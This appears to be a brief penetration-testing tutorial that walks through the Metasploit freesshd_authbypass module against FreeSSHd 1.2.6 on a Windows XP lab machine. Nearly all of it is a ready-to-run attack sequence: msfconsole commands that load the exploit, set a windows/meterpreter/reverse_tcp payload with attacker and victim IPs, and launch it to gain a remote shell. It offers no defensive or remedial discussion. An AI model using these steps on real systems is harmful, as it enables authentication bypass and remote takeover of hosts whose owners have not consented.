This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.
Exploit Targets
Freesshd 1.2.6 / Windows
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/ssh/freesshd_authbypass
msf exploit (freesshd_authbypass)>set payload windows/meterpreter/reverse_tcp
msf exploit (freesshd_authbypass set lhost 192.168.1.4 (IP of Local Host)
msf exploit (freesshd_authbypass)>set rhost 192.168.1.6 (IP of Victim PC)
msf exploit (freesshd_authbypass)>exploit